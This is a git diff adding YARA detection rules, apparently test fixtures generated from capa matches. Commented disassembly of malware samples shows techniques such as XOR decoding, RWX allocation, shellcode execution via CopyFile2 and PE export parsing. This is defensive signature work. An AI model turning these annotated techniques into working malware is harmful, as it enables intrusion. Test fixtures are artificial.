.text:0x00403eb6 2bc1 sub eax,ecx + .text:0x00403eb8 740a jz 0x00403ec4 + .text:0x00403eba 50 push eax + .text:0x00403ebb 56 push esi + .text:0x00403ebc e8ef010000 call 0x004040b0 ;sub_004040b0(<0x00403e44>,0xdff82eae) + .text:0x00403ec1 83c408 add esp,8 + .text:0x00403ec4 loc_00403ec4: [1 XREFS] + .text:0x00403ec4 56 push esi + .text:0x00403ec5 e866020000 call 0x00404130 ;sub_00404130(<0x00403e44>) + .text:0x00403eca 83c404 add esp,4 + .text:0x00403ecd 85c0 test eax,eax + .text:0x00403ecf 7423 jz 0x00403ef4 + .text:0x00403ed1 56 push esi + .text:0x00403ed2 e819010000 call 0x00403ff0 ;sub_00403ff0(<0x00403e44>) + .text:0x00403ed7 8b16 mov edx,dword [esi] + .text:0x00403ed9 83c404 add esp,4 + .text:0x00403edc 8b4228 mov eax,dword [edx + 40] + .text:0x00403edf 85c0 test eax,eax + .text:0x00403ee1 7428 jz 0x00403f0b + .text:0x00403ee3 03c7 add eax,edi + .text:0x00403ee5 85c0 test eax,eax + .text:0x00403ee7 740b jz 0x00403ef4 + .text:0x00403ee9 6a00 push 0 + .text:0x00403eeb 6a01 push 1 + .text:0x00403eed 57 push edi + .text:0x00403eee ffd0 call eax ;UnknownApi() + .text:0x00403ef0 85c0 test eax,eax + .text:0x00403ef2 7510 jnz 0x00403f04 + .text:0x00403ef4 loc_00403ef4: [2 XREFS] + .text:0x00403ef4 56 push esi + .text:0x00403ef5 e8e6030000 call 0x004042e0 ;sub_004042e0(<0x00403e44>) + .text:0x00403efa 83c404 add esp,4 + .text:0x00403efd 33c0 xor eax,eax + .text:0x00403eff 5f pop edi + .text:0x00403f00 5e pop esi + .text:0x00403f01 5d pop ebp + .text:0x00403f02 5b pop ebx + .text:0x00403f03 c3 ret + .text:0x00403f04 loc_00403f04: [1 XREFS] + .text:0x00403f04 c7461001000000 mov dword [esi + 16],1 + .text:0x00403f0b loc_00403f0b: [1 XREFS] + .text:0x00403f0b 8bc6 mov eax,esi + .text:0x00403f0d 5f pop edi + .text:0x00403f0e 5e pop esi + .text:0x00403f0f 5d pop ebp + .text:0x00403f10 5b pop ebx + .text:0x00403f11 c3 ret + */ + $c49 = { 53 55 8B 6C 24 ?? 56 57 C6 45 ?? 4D C6 45 ?? 5A 66 81 7D ?? 4D 5A 74 ?? 5F 5E 5D 33 C0 5B C3 8B 5D ?? 03 DD 81 3B 50 45 00 00 74 ?? 5F 5E 5D 33 C0 5B C3 8B 43 ?? 8B 4B ?? 8B 35 ?? ?? ?? ?? 6A 04 68 00 20 00 00 50 51 FF D6 8B F8 85 FF 75 ?? 8B 53 ?? 6A 04 68 00 20 00 00 52 50 FF D6 8B F8 85 FF 75 ?? 5F 5E 5D 5B C3 6A 14 6A 00 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 33 C0 6A 04 68 00 10 00 00 89 7E ?? 89 46 ?? 89 46 ?? 89 46 ?? 8B 43 ?? 50 57 FF 15 ?? ?? ?? ?? 8B 4B ?? 6A 04 68 00 10 00 00 51 57 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4B ?? 03 D1 8B 0D ?? ?? ?? ?? 52 55 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 4C 24 ?? 03 C1 56 53 89 06 55 89 78 ?? E8 ?? ?? ?? ?? 8B 4B ?? 8B C7 83 C4 0C 2B C1 74 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 08 56 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 16 83 C4 04 8B 42 ?? 85 C0 74 ?? 03 C7 85 C0 74 ?? 6A 00 6A 01 57 FF D0 85 C0 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 04 33 C0 5F 5E 5D 5B C3 C7 46 ?? 01 00 00 00 8B C6 5F 5E 5D 5B C3 } + condition: + all of them +} + diff --git a/yara/expected_c2bb17c12975e.yar b/yara/expected_c2bb17c12975e.yar new file mode 100644 index 0000000..14b62a1 --- /dev/null +++ b/yara/expected_c2bb17c12975e.yar @@ -0,0 +1,201 @@ +rule super_rule_50580 +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "50580ef0b882905316c4569162ea07d9" + strings: + /* +Basic Block at 0x140001040@50580ef0b882905316c4569162ea07d9 with 1 features: + - encode data using XOR + .text:0x140001040 loc_140001040: [1 XREFS] + .text:0x140001040 f30f6f0439 movdqu xmm0,oword [rcx + rdi] + .text:0x140001045 660fefc2 pxor xmm0,xmm2 + .text:0x140001049 f30f7f0439 movdqu oword [rcx + rdi],xmm0 + .text:0x14000104e f30f6f4c3910 movdqu xmm1,oword [rcx + rdi + 16] + .text:0x140001054 660fefca pxor xmm1,xmm2 + .text:0x140001058 f30f7f4c3910 movdqu oword [rcx + rdi + 16],xmm1 + .text:0x14000105e f30f6f443920 movdqu xmm0,oword [rcx + rdi + 32] + .text:0x140001064 660fefc2 pxor xmm0,xmm2 + .text:0x140001068 f30f7f443920 movdqu oword [rcx + rdi + 32],xmm0 + .text:0x14000106e f30f6f443930 movdqu xmm0,oword [rcx + rdi + 48] + .text:0x140001074 660fefc2 pxor xmm0,xmm2 + .text:0x140001078 f30f7f443930 movdqu oword [rcx + rdi + 48],xmm0 + .text:0x14000107e 4883c140 add rcx,64 + .text:0x140001082 483bc8 cmp rcx,rax + .text:0x140001085 7cb9 jl 0x140001040 + */ + $c0 = { F3 0F 6F 04 39 66 0F EF C2 F3 0F 7F 04 39 F3 0F 6F 4C 39 ?? 66 0F EF CA F3 0F 7F 4C 39 ?? F3 0F 6F 44 39 ?? 66 0F EF C2 F3 0F 7F 44 39 ?? F3 0F 6F 44 39 ?? 66 0F EF C2 F3 0F 7F 44 39 ?? 48 83 C1 40 48 3B C8 7C ?? } + /* +Basic Block at 0x140001090@50580ef0b882905316c4569162ea07d9 with 1 features: + - encode data using XOR + .text:0x140001090 loc_140001090: [1 XREFS] + .text:0x140001090 80343862 xor byte [rax + rdi],98 + .text:0x140001094 48ffc0 inc rax + .text:0x140001097 483d1f030000 cmp rax,799 + .text:0x14000109d 7cf1 jl 0x140001090 + */ + $c1 = { 80 34 38 62 48 FF C0 48 3D 1F 03 00 00 7C ?? } + /* +Basic Block at 0x14000109f@50580ef0b882905316c4569162ea07d9 with 1 features: + - allocate RWX memory + .text:0x14000109f 33c9 xor ecx,ecx + .text:0x1400010a1 ba1f030000 mov edx,799 + .text:0x1400010a6 41b800100000 mov r8d,0x00001000 + .text:0x1400010ac 448d4940 lea r9d,dword [rcx + 64] + .text:0x1400010b0 ff154a0f0000 call qword [rip + 3914] ;kernel32.VirtualAlloc(0,799,0x00001000,64) + .text:0x1400010b6 41b81f030000 mov r8d,799 + .text:0x1400010bc 488bd7 mov rdx,rdi + .text:0x1400010bf 488bc8 mov rcx,rax + .text:0x1400010c2 488bd8 mov rbx,rax + .text:0x1400010c5 e8650d0000 call 0x140001e2f ;memmove_140001e2f() + .text:0x1400010ca 488d0d7f110000 lea rcx,qword [rip + 4479] + .text:0x1400010d1 c744242020000000 mov dword [rsp + 32],32 + .text:0x1400010d9 c744242401000000 mov dword [rsp + 36],1 + .text:0x1400010e1 48c7442428000000 mov qword [rsp + 40],0 + .text:0x1400010ea 48895c2430 mov qword [rsp + 48],rbx + .text:0x1400010ef 48c7442438000000 mov qword [rsp + 56],0 + .text:0x1400010f8 ff150a0f0000 call qword [rip + 3850] ;kernel32.DeleteFileW(0x140002250) + .text:0x1400010fe 4c8d442420 lea r8,qword [rsp + 32] + .text:0x140001103 488d1546110000 lea rdx,qword [rip + 4422] + .text:0x14000110a 488d0d77110000 lea rcx,qword [rip + 4471] + .text:0x140001111 ff15f90e0000 call qword [rip + 3833] ;UnknownApi() + .text:0x140001117 33c0 xor eax,eax + .text:0x140001119 488b4c2440 mov rcx,qword [rsp + 64] + .text:0x14000111e 4833cc xor rcx,rsp + .text:0x140001121 e82a000000 call 0x140001150 ;__security_check_cookie(0x2b992ddfa232) + .text:0x140001126 488b5c2460 mov rbx,qword [rsp + 96] + .text:0x14000112b 4883c450 add rsp,80 + .text:0x14000112f 5f pop rdi + .text:0x140001130 c3 ret + */ + $c2 = { 33 C9 BA 1F 03 00 00 41 B8 00 10 00 00 44 8D 49 ?? FF 15 ?? ?? ?? ?? 41 B8 1F 03 00 00 48 8B D7 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? C7 44 24 ?? 20 00 00 00 C7 44 24 ?? 01 00 00 00 48 C7 44 24 ?? 00 00 00 00 48 89 5C 24 ?? 48 C7 44 24 ?? 00 00 00 00 FF 15 ?? ?? ?? ?? 4C 8D 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 C4 50 5F C3 } + /* +function at 0x140001010@50580ef0b882905316c4569162ea07d9 with 3 features: + - copy file + - delete file + - execute shellcode via CopyFile2 + .text:0x140001010 + .text:0x140001010 FUNC: int msx64call sub_140001010( ) [2 XREFS] + .text:0x140001010 + .text:0x140001010 Stack Variables: (offset from initial top of stack) + .text:0x140001010 32: void * shadow3 + .text:0x140001010 24: void * shadow2 + .text:0x140001010 16: void * shadow1 + .text:0x140001010 8: void * shadow0 + .text:0x140001010 -24: int local24 + .text:0x140001010 -32: int local32 + .text:0x140001010 -40: int local40 + .text:0x140001010 -48: int local48 + .text:0x140001010 -52: int local52 + .text:0x140001010 -56: int local56 + .text:0x140001010 + .text:0x140001010 48895c2408 mov qword [rsp + 8],rbx + .text:0x140001015 57 push rdi + .text:0x140001016 4883ec50 sub rsp,80 + .text:0x14000101a 488b05df1f0000 mov rax,qword [rip + 8159] + .text:0x140001021 4833c4 xor rax,rsp + .text:0x140001024 4889442440 mov qword [rsp + 64],rax + .text:0x140001029 660f6f158f120000 movdqa xmm2,oword [rip + 4751] + .text:0x140001031 488d3d08200000 lea rdi,qword [rip + 8200] + .text:0x140001038 33c9 xor ecx,ecx + .text:0x14000103a b800030000 mov eax,768 + .text:0x14000103f 90 nop + .text:0x140001040 loc_140001040: [1 XREFS] + .text:0x140001040 f30f6f0439 movdqu xmm0,oword [rcx + rdi] + .text:0x140001045 660fefc2 pxor xmm0,xmm2 + .text:0x140001049 f30f7f0439 movdqu oword [rcx + rdi],xmm0 + .text:0x14000104e f30f6f4c3910 movdqu xmm1,oword [rcx + rdi + 16] + .text:0x140001054 660fefca pxor xmm1,xmm2 + .text:0x140001058 f30f7f4c3910 movdqu oword [rcx + rdi + 16],xmm1 + .text:0x14000105e f30f6f443920 movdqu xmm0,oword [rcx + rdi + 32] + .text:0x140001064 660fefc2 pxor xmm0,xmm2 + .text:0x140001068 f30f7f443920 movdqu oword [rcx + rdi + 32],xmm0 + .text:0x14000106e f30f6f443930 movdqu xmm0,oword [rcx + rdi + 48] + .text:0x140001074 660fefc2 pxor xmm0,xmm2 + .text:0x140001078 f30f7f443930 movdqu oword [rcx + rdi + 48],xmm0 + .text:0x14000107e 4883c140 add rcx,64 + .text:0x140001082 483bc8 cmp rcx,rax + .text:0x140001085 7cb9 jl 0x140001040 + .text:0x140001087 660f1f8400000000 nop word [rax + rax] + .text:0x140001090 loc_140001090: [1 XREFS] + .text:0x140001090 80343862 xor byte [rax + rdi],98 + .text:0x140001094 48ffc0 inc rax + .text:0x140001097 483d1f030000 cmp rax,799 + .text:0x14000109d 7cf1 jl 0x140001090 + .text:0x14000109f 33c9 xor ecx,ecx + .text:0x1400010a1 ba1f030000 mov edx,799 + .text:0x1400010a6 41b800100000 mov r8d,0x00001000 + .text:0x1400010ac 448d4940 lea r9d,dword [rcx + 64] + .text:0x1400010b0 ff154a0f0000 call qword [rip + 3914] ;kernel32.VirtualAlloc(0,799,0x00001000,64) + .text:0x1400010b6 41b81f030000 mov r8d,799 + .text:0x1400010bc 488bd7 mov rdx,rdi + .text:0x1400010bf 488bc8 mov rcx,rax + .text:0x1400010c2 488bd8 mov rbx,rax + .text:0x1400010c5 e8650d0000 call 0x140001e2f ;memmove_140001e2f() + .text:0x1400010ca 488d0d7f110000 lea rcx,qword [rip + 4479] + .text:0x1400010d1 c744242020000000 mov dword [rsp + 32],32 + .text:0x1400010d9 c744242401000000 mov dword [rsp + 36],1 + .text:0x1400010e1 48c7442428000000 mov qword [rsp + 40],0 + .text:0x1400010ea 48895c2430 mov qword [rsp + 48],rbx + .text:0x1400010ef 48c7442438000000 mov qword [rsp + 56],0 + .text:0x1400010f8 ff150a0f0000 call qword [rip + 3850] ;kernel32.DeleteFileW(0x140002250) + .text:0x1400010fe 4c8d442420 lea r8,qword [rsp + 32] + .text:0x140001103 488d1546110000 lea rdx,qword [rip + 4422] + .text:0x14000110a 488d0d77110000 lea rcx,qword [rip + 4471] + .text:0x140001111 ff15f90e0000 call qword [rip + 3833] ;UnknownApi() + .text:0x140001117 33c0 xor eax,eax + .text:0x140001119 488b4c2440 mov rcx,qword [rsp + 64] + .text:0x14000111e 4833cc xor rcx,rsp + .text:0x140001121 e82a000000 call 0x140001150 ;__security_check_cookie(0x2b992ddfa232) + .text:0x140001126 488b5c2460 mov rbx,qword [rsp + 96] + .text:0x14000112b 4883c450 add rsp,80 + .text:0x14000112f 5f pop rdi + .text:0x140001130 c3 ret + */ + $c3 = { 48 89 5C 24 ?? 57 48 83 EC 50 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 66 0F 6F 15 ?? ?? 00 00 48 8D 3D ?? ?? ?? ?? 33 C9 B8 00 03 00 00 90 F3 0F 6F 04 39 66 0F EF C2 F3 0F 7F 04 39 F3 0F 6F 4C 39 ?? 66 0F EF CA F3 0F 7F 4C 39 ?? F3 0F 6F 44 39 ?? 66 0F EF C2 F3 0F 7F 44 39 ?? F3 0F 6F 44 39 ?? 66 0F EF C2 F3 0F 7F 44 39 ?? 48 83 C1 40 48 3B C8 7C ?? 66 0F 1F 84 00 ?? ?? 00 00 80 34 38 62 48 FF C0 48 3D 1F 03 00 00 7C ?? 33 C9 BA 1F 03 00 00 41 B8 00 10 00 00 44 8D 49 ?? FF 15 ?? ?? ?? ?? 41 B8 1F 03 00 00 48 8B D7 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? C7 44 24 ?? 20 00 00 00 C7 44 24 ?? 01 00 00 00 48 C7 44 24 ?? 00 00 00 00 48 89 5C 24 ?? 48 C7 44 24 ?? 00 00 00 00 FF 15 ?? ?? ?? ?? 4C 8D 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 C4 50 5F C3 } + /* +function at 0x140001a24@50580ef0b882905316c4569162ea07d9 with 1 features: + - parse PE header + .text:0x140001a24 + .text:0x140001a24 FUNC: int msx64call sub_140001a24( ) [2 XREFS] + .text:0x140001a24 + .text:0x140001a24 Stack Variables: (offset from initial top of stack) + .text:0x140001a24 32: void * shadow3 + .text:0x140001a24 24: void * shadow2 + .text:0x140001a24 16: void * shadow1 + .text:0x140001a24 8: void * shadow0 + .text:0x140001a24 + .text:0x140001a24 4883ec28 sub rsp,40 + .text:0x140001a28 33c9 xor ecx,ecx + .text:0x140001a2a ff1518060000 call qword [rip + 1560] ;kernel32.GetModuleHandleW(0) + .text:0x140001a30 4885c0 test rax,rax + .text:0x140001a33 7439 jz 0x140001a6e + .text:0x140001a35 b94d5a0000 mov ecx,0x00005a4d + .text:0x140001a3a 663908 cmp word [rax],cx + .text:0x140001a3d 752f jnz 0x140001a6e + .text:0x140001a3f 4863483c movsxd rcx,dword [rax + 60] + .text:0x140001a43 4803c8 add rcx,rax + .text:0x140001a46 813950450000 cmp dword [rcx],0x00004550 + .text:0x140001a4c 7520 jnz 0x140001a6e + .text:0x140001a4e b80b020000 mov eax,523 + .text:0x140001a53 66394118 cmp word [rcx + 24],ax + .text:0x140001a57 7515 jnz 0x140001a6e + .text:0x140001a59 83b9840000000e cmp dword [rcx + 132],14 + .text:0x140001a60 760c jbe 0x140001a6e + .text:0x140001a62 83b9f800000000 cmp dword [rcx + 248],0 + .text:0x140001a69 0f95c0 setnz al + .text:0x140001a6c eb02 jmp 0x140001a70 + .text:0x140001a6e loc_140001a6e: [5 XREFS] + .text:0x140001a6e 32c0 xor al,al + .text:0x140001a70 loc_140001a70: [1 XREFS] + .text:0x140001a70 4883c428 add rsp,40 + .text:0x140001a74 c3 ret + */ + $c4 = { 48 83 EC 28 33 C9 FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? B9 4D 5A 00 00 66 39 08 75 ?? 48 63 48 ?? 48 03 C8 81 39 50 45 00 00 75 ?? B8 0B 02 00 00 66 39 41 ?? 75 ?? 83 B9 ?? ?? ?? ?? 0E 76 ?? 83 B9 ?? ?? ?? ?? 00 0F 95 C0 EB ?? 32 C0 48 83 C4 28 C3 } + condition: + all of them +} + diff --git a/yara/expected_pma_01-01.exe_01-02.exe b/yara/expected_pma_01-01.exe_01-02.exe new file mode 100644 index 0000000..21355c7 --- /dev/null +++ b/yara/expected_pma_01-01.exe_01-02.exe @@ -0,0 +1,840 @@ +rule super_rule_bb742 +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "bb7425b82141a1c0f7d60e5106676bb1" + strings: + /* +function at 0x00401440@bb7425b82141a1c0f7d60e5106676bb1 with 3 features: + - copy file + - read file via mapping + - resolve function by parsing PE exports + .text:0x00401440 + .text:0x00401440 FUNC: int cdecl sub_00401440( int arg0, int arg1, ) [2 XREFS] + .text:0x00401440 + .text:0x00401440 Stack Variables: (offset from initial top of stack) + .text:0x00401440 8: int arg1 + .text:0x00401440 4: int arg0 + .text:0x00401440 -4: int local4 + .text:0x00401440 -8: int local8 + .text:0x00401440 -12: int local12 + .text:0x00401440 -16: int local16 + .text:0x00401440 -20: int local20 + .text:0x00401440 -24: int local24 + .text:0x00401440 -28: int local28 + .text:0x00401440 -32: int local32 + .text:0x00401440 -36: int local36 + .text:0x00401440 -40: int local40 + .text:0x00401440 -44: int local44 + .text:0x00401440 -48: int local48 + .text:0x00401440 -52: int local52 + .text:0x00401440 -56: int local56 + .text:0x00401440 -60: int local60 + .text:0x00401440 -64: int local64 + .text:0x00401440 -68: int local68 + .text:0x00401440 + .text:0x00401440 8b442404 mov eax,dword [esp + 4] + .text:0x00401444 83ec44 sub esp,68 + .text:0x00401447 83f802 cmp eax,2 + .text:0x0040144a 53 push ebx + .text:0x0040144b 55 push ebp + .text:0x0040144c 56 push esi + .text:0x0040144d 57 push edi + .text:0x0040144e 0f85bf030000 jnz 0x00401813 + .text:0x00401454 8b44245c mov eax,dword [esp + 92] + .text:0x00401458 beb0304000 mov esi,0x004030b0 + .text:0x0040145d 8b4004 mov eax,dword [eax + 4] + .text:0x00401460 loc_00401460: [1 XREFS] + .text:0x00401460 8a10 mov dl,byte [eax] + .text:0x00401462 8a1e mov bl,byte [esi] + .text:0x00401464 8aca mov cl,dl + .text:0x00401466 3ad3 cmp dl,bl + .text:0x00401468 751e jnz 0x00401488 + .text:0x0040146a 84c9 test cl,cl + .text:0x0040146c 7416 jz 0x00401484 + .text:0x0040146e 8a5001 mov dl,byte [eax + 1] + .text:0x00401471 8a5e01 mov bl,byte [esi + 1] + .text:0x00401474 8aca mov cl,dl + .text:0x00401476 3ad3 cmp dl,bl + .text:0x00401478 750e jnz 0x00401488 + .text:0x0040147a 83c002 add eax,2 + .text:0x0040147d 83c602 add esi,2 + .text:0x00401480 84c9 test cl,cl + .text:0x00401482 75dc jnz 0x00401460 + .text:0x00401484 loc_00401484: [1 XREFS] + .text:0x00401484 33c0 xor eax,eax + .text:0x00401486 eb05 jmp 0x0040148d + .text:0x00401488 loc_00401488: [2 XREFS] + .text:0x00401488 1bc0 sbb eax,eax + .text:0x0040148a 83d8ff sbb eax,0xffffffff + .text:0x0040148d loc_0040148d: [1 XREFS] + .text:0x0040148d 85c0 test eax,eax + .text:0x0040148f 0f857e030000 jnz 0x00401813 + .text:0x00401495 8b3d14204000 mov edi,dword [0x00402014] + .text:0x0040149b 50 push eax + .text:0x0040149c 50 push eax + .text:0x0040149d 6a03 push 3 + .text:0x0040149f 50 push eax + .text:0x004014a0 6a01 push 1 + .text:0x004014a2 6800000080 push 0x80000000 + .text:0x004014a7 688c304000 push 0x0040308c + .text:0x004014ac ffd7 call edi ;kernel32.CreateFileA(0x0040308c,0x80000000,1,1,3,1,1) + .text:0x004014ae 8b1d10204000 mov ebx,dword [0x00402010] + .text:0x004014b4 6a00 push 0 + .text:0x004014b6 6a00 push 0 + .text:0x004014b8 6a00 push 0 + .text:0x004014ba 6a02 push 2 + .text:0x004014bc 6a00 push 0 + .text:0x004014be 50 push eax + .text:0x004014bf 89442464 mov dword [esp + 100],eax + .text:0x004014c3 ffd3 call ebx ;kernel32.CreateFileMappingA(kernel32.CreateFileA(0x0040308c,0x80000000,1,1,3,1,1),0,2,0,0,0) + .text:0x004014c5 8b2d0c204000 mov ebp,dword [0x0040200c] + .text:0x004014cb 6a00 push 0 + .text:0x004014cd 6a00 push 0 + .text:0x004014cf 6a00 push 0 + .text:0x004014d1 6a04 push 4 + .text:0x004014d3 50 push eax + .text:0x004014d4 ffd5 call ebp ;kernel32.MapViewOfFile(kernel32.CreateFileMappingA(<0x004014ac>,0,2,0,0,0),4,0,0,0) + .text:0x004014d6 6a00 push 0 + .text:0x004014d8 6a00 push 0 + .text:0x004014da 6a03 push 3 + .text:0x004014dc 6a00 push 0 + .text:0x004014de 6a01 push 1 + .text:0x004014e0 8bf0 mov esi,eax + .text:0x004014e2 6800000010 push 0x10000000 + .text:0x004014e7 687c304000 push 0x0040307c + .text:0x004014ec 89742474 mov dword [esp + 116],esi + .text:0x004014f0 ffd7 call edi ;kernel32.CreateFileA(0x0040307c,0x10000000,1,0,3,0,0) + .text:0x004014f2 83f8ff cmp eax,0xffffffff + .text:0x004014f5 89442450 mov dword [esp + 80],eax + .text:0x004014f9 6a00 push 0 + .text:0x004014fb 7506 jnz 0x00401503 + .text:0x004014fd ff1530204000 call dword [0x00402030] ;msvcrt.exit(0) + .text:0x00401503 loc_00401503: [1 XREFS] + .text:0x00401503 6a00 push 0 + .text:0x00401505 6a00 push 0 + .text:0x00401507 6a04 push 4 + .text:0x00401509 6a00 push 0 + .text:0x0040150b 50 push eax + .text:0x0040150c ffd3 call ebx ;kernel32.CreateFileMappingA(kernel32.CreateFileA(0x0040307c,0x10000000,1,0,3,0,0),0,4,0,0,0) + .text:0x0040150e 83f8ff cmp eax,0xffffffff + .text:0x00401511 6a00 push 0 + .text:0x00401513 7506 jnz 0x0040151b + .text:0x00401515 ff1530204000 call dword [0x00402030] ;msvcrt.exit(0) + .text:0x0040151b loc_0040151b: [1 XREFS] + .text:0x0040151b 6a00 push 0 + .text:0x0040151d 6a00 push 0 + .text:0x0040151f 681f000f00 push 0x000f001f + .text:0x00401524 50 push eax + .text:0x00401525 ffd5 call ebp ;kernel32.MapViewOfFile(kernel32.CreateFileMappingA(<0x004014f0>,0,4,0,0,0),0x000f001f,0,0,0) + .text:0x00401527 8be8 mov ebp,eax + .text:0x00401529 85ed test ebp,ebp + .text:0x0040152b 896c245c mov dword [esp + 92],ebp + .text:0x0040152f 7507 jnz 0x00401538 + .text:0x00401531 50 push eax + .text:0x00401532 ff1530204000 call dword [0x00402030] ;msvcrt.exit(<0x00401525>) + .text:0x00401538 loc_00401538: [1 XREFS] + .text:0x00401538 8b7e3c mov edi,dword [esi + 60] + .text:0x0040153b 56 push esi + .text:0x0040153c 03fe add edi,esi + .text:0x0040153e 57 push edi + .text:0x0040153f 897c2440 mov dword [esp + 64],edi + .text:0x00401543 8b4778 mov eax,dword [edi + 120] + .text:0x00401546 50 push eax + .text:0x00401547 e8f4faffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,kernel32.MapViewOfFile(<0x004014c3>,4,0,0,0)) + .text:0x0040154c 8b753c mov esi,dword [ebp + 60] + .text:0x0040154f 55 push ebp + .text:0x00401550 03f5 add esi,ebp + .text:0x00401552 8bd8 mov ebx,eax + .text:0x00401554 56 push esi + .text:0x00401555 895c2438 mov dword [esp + 56],ebx + .text:0x00401559 8b4e78 mov ecx,dword [esi + 120] + .text:0x0040155c 51 push ecx + .text:0x0040155d e8defaffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bbd170,kernel32.MapViewOfFile(<0x0040150c>,0x000f001f,0,0,0)) + .text:0x00401562 8b542470 mov edx,dword [esp + 112] + .text:0x00401566 8be8 mov ebp,eax + .text:0x00401568 8b431c mov eax,dword [ebx + 28] + .text:0x0040156b 52 push edx + .text:0x0040156c 57 push edi + .text:0x0040156d 50 push eax + .text:0x0040156e e8cdfaffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,<0x004014d4>) + .text:0x00401573 8b4c247c mov ecx,dword [esp + 124] + .text:0x00401577 8b5324 mov edx,dword [ebx + 36] + .text:0x0040157a 51 push ecx + .text:0x0040157b 57 push edi + .text:0x0040157c 52 push edx + .text:0x0040157d 8944244c mov dword [esp + 76],eax + .text:0x00401581 e8bafaffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,<0x004014d4>) + .text:0x00401586 8b4b20 mov ecx,dword [ebx + 32] + .text:0x00401589 89442464 mov dword [esp + 100],eax + .text:0x0040158d 8b842488000000 mov eax,dword [esp + 136] + .text:0x00401594 50 push eax + .text:0x00401595 57 push edi + .text:0x00401596 51 push ecx + .text:0x00401597 e8a4faffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,<0x004014d4>) + .text:0x0040159c 8b942498000000 mov edx,dword [esp + 152] + .text:0x004015a3 8b7e7c mov edi,dword [esi + 124] + .text:0x004015a6 8944246c mov dword [esp + 108],eax + .text:0x004015aa 8b4678 mov eax,dword [esi + 120] + .text:0x004015ad 52 push edx + .text:0x004015ae 56 push esi + .text:0x004015af 50 push eax + .text:0x004015b0 e8bbfaffff call 0x00401070 ;sub_00401070(0x61616161,0xa2bbd170,<0x00401525>) + .text:0x004015b5 8bcf mov ecx,edi + .text:0x004015b7 8bf3 mov esi,ebx + .text:0x004015b9 8bd1 mov edx,ecx + .text:0x004015bb 8bfd mov edi,ebp + .text:0x004015bd c1e902 shr ecx,2 + .text:0x004015c0 f3a5 rep: movsd + .text:0x004015c2 8bca mov ecx,edx + .text:0x004015c4 83c448 add esp,72 + .text:0x004015c7 83e103 and ecx,3 + .text:0x004015ca 8944243c mov dword [esp + 60],eax + .text:0x004015ce f3a4 rep: movsb + .text:0x004015d0 8b4b14 mov ecx,dword [ebx + 20] + .text:0x004015d3 894d14 mov dword [ebp + 20],ecx + .text:0x004015d6 8b5318 mov edx,dword [ebx + 24] + .text:0x004015d9 8d5d28 lea ebx,dword [ebp + 40] + .text:0x004015dc 895518 mov dword [ebp + 24],edx + .text:0x004015df c1e104 shl ecx,4 + .text:0x004015e2 8d1403 lea edx,dword [ebx + eax] + .text:0x004015e5 89550c mov dword [ebp + 12],edx + .text:0x004015e8 8b3510304000 mov esi,dword [0x00403010] + .text:0x004015ee 8bd3 mov edx,ebx + .text:0x004015f0 83c310 add ebx,16 + .text:0x004015f3 895c2420 mov dword [esp + 32],ebx + .text:0x004015f7 8932 mov dword [edx],esi + .text:0x004015f9 8b3514304000 mov esi,dword [0x00403014] + .text:0x004015ff 897204 mov dword [edx + 4],esi + .text:0x00401602 8b3518304000 mov esi,dword [0x00403018] + .text:0x00401608 897208 mov dword [edx + 8],esi + .text:0x0040160b 8b351c304000 mov esi,dword [0x0040301c] + .text:0x00401611 89720c mov dword [edx + 12],esi + .text:0x00401614 8b5514 mov edx,dword [ebp + 20] + .text:0x00401617 8d3493 lea esi,dword [ebx + edx * 4] + .text:0x0040161a 8d3cd3 lea edi,dword [ebx + edx * 8] + .text:0x0040161d 89742448 mov dword [esp + 72],esi + .text:0x00401621 897c2444 mov dword [esp + 68],edi + .text:0x00401625 8d1403 lea edx,dword [ebx + eax] + .text:0x00401628 03d9 add ebx,ecx + .text:0x0040162a 89551c mov dword [ebp + 28],edx + .text:0x0040162d 8d1406 lea edx,dword [esi + eax] + .text:0x00401630 03c7 add eax,edi + .text:0x00401632 895524 mov dword [ebp + 36],edx + .text:0x00401635 894520 mov dword [ebp + 32],eax + .text:0x00401638 8b442424 mov eax,dword [esp + 36] + .text:0x0040163c 33c9 xor ecx,ecx + .text:0x0040163e 33d2 xor edx,edx + .text:0x00401640 8b6814 mov ebp,dword [eax + 20] + .text:0x00401643 894c245c mov dword [esp + 92],ecx + .text:0x00401647 85ed test ebp,ebp + .text:0x00401649 8954242c mov dword [esp + 44],edx + .text:0x0040164d 0f8681010000 jbe 0x004017d4 + .text:0x00401653 loc_00401653: [1 XREFS] + .text:0x00401653 8b6c241c mov ebp,dword [esp + 28] + .text:0x00401657 837d0000 cmp dword [ebp],0 + .text:0x0040165b 0f8458010000 jz 0x004017b9 + .text:0x00401661 8b6818 mov ebp,dword [eax + 24] + .text:0x00401664 c744242800000000 mov dword [esp + 40],0 + .text:0x0040166c 85ed test ebp,ebp + .text:0x0040166e 0f8645010000 jbe 0x004017b9 + .text:0x00401674 8b6c2420 mov ebp,dword [esp + 32] + .text:0x00401678 8d6c8d00 lea ebp,dword [ebp + ecx * 4] + .text:0x0040167c 8d0c4e lea 